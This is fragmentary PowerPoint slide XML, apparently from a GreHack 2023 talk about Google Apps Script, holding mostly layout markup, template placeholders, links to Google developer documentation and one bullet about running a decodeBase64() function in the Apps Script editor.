            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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20" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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21" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="3882600" cy="321912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24" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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25" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="2804040"/>
            <a:ext cx="388260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293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="388260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28" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4370760" y="1122480"/>
            <a:ext cx="388260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
        <p:nvSpPr>
          <p:cNvPr id="29" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="2804040"/>
            <a:ext cx="7956360" cy="1535400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="5143320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="11214E"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Grouper 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="494640" y="1763280"/>
            <a:ext cx="7175880" cy="1616760"/>
            <a:chOff x="494640" y="1763280"/>
            <a:chExt cx="7175880" cy="1616760"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="ZoneTexte 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="494640" y="3011040"/>
              <a:ext cx="4912920" cy="369000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="ZoneTexte 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="494640" y="1763280"/>
              <a:ext cx="7175880" cy="1085760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:effectRef>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="610200" y="2910600"/>
              <a:ext cx="370080" cy="3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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphique 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684560" y="4620960"/>
            <a:ext cx="1271880" cy="255600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610200" y="3147480"/>
            <a:ext cx="8346600" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>NAME</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1905840"/>
            <a:ext cx="8346600" cy="762480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4800" b="1" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="4800" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PlaceHolder 3"/>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r>
              <a:rPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Cliquez pour éditer le format du texte-titre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1214E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-720" y="623520"/>
            <a:ext cx="9143640" cy="4350960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="4351437">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="324090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="4351437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4351437"/>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7" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-720" y="802440"/>
            <a:ext cx="9143640" cy="4350960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="4351437">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="324090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="4351437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4351437"/>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78" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7989840" y="4793760"/>
            <a:ext cx="742680" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="11214E"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="11214E"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova"/>
              </a:rPr>
              <a:t>&lt;date/heure&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="700" b="0" strike="noStrike" spc="-1">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="420840" y="4793760"/>
            <a:ext cx="2894400" cy="228240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buNone/>
              <a:defRPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;pied de page&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Grouper 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8313480" y="-4680"/>
            <a:ext cx="615960" cy="583200"/>
            <a:chOff x="8313480" y="-4680"/>
            <a:chExt cx="615960" cy="583200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="181" name="Image 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="8805960" y="5400"/>
              <a:ext cx="123480" cy="468360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="182" name="Image 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8313480" y="-4680"/>
              <a:ext cx="123480" cy="468360"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="183" name="Image 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="8559360" y="332280"/>
              <a:ext cx="123480" cy="368640"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8438400" y="1080"/>
              <a:ext cx="369720" cy="45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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="178920"/>
            <a:ext cx="7955280" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova"/>
                <a:ea typeface="Verdana"/>
              </a:rPr>
              <a:t>ADD YOUR TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Graphique 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8477280" y="80640"/>
            <a:ext cx="280080" cy="280080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293760" y="1122480"/>
            <a:ext cx="7956360" cy="3219120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova"/>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1350" b="0" strike="noStrike" spc="-1">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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script.google.com/" TargetMode="Externa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hyperlink" Target="https://www.grehack.fr/"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5.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5.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47.webp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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5.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hyperlink" Target="https://developers.google.com/admin-sdk/directory/reference/rest" TargetMode="External"/><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s.google.com/apps-script/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://script.google.com/home" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2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developers.google.com/apps-script/api/concep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script.google.com/"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p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457103" y="1427509"/>
            <a:ext cx="8346600" cy="3077416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" strike="noStrike" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>GreHack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t> 2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova Rg"/>
              </a:rPr>
              <a:t>Google Apps Script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="751"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova Rg"/>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decodeBase64() function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sous-titre 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35ADBA7D-7531-44A7-5684-106E8086A538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129607"/>
            <a:ext cx="7164825" cy="377724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:ea typeface="Cambria" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                <a:cs typeface="Amiri Quran" panose="00000500000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>decodeBase64() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>function on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="90000"/>
                    <a:lumOff val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://script.google.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="90000"/>
                  <a:lumOff val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
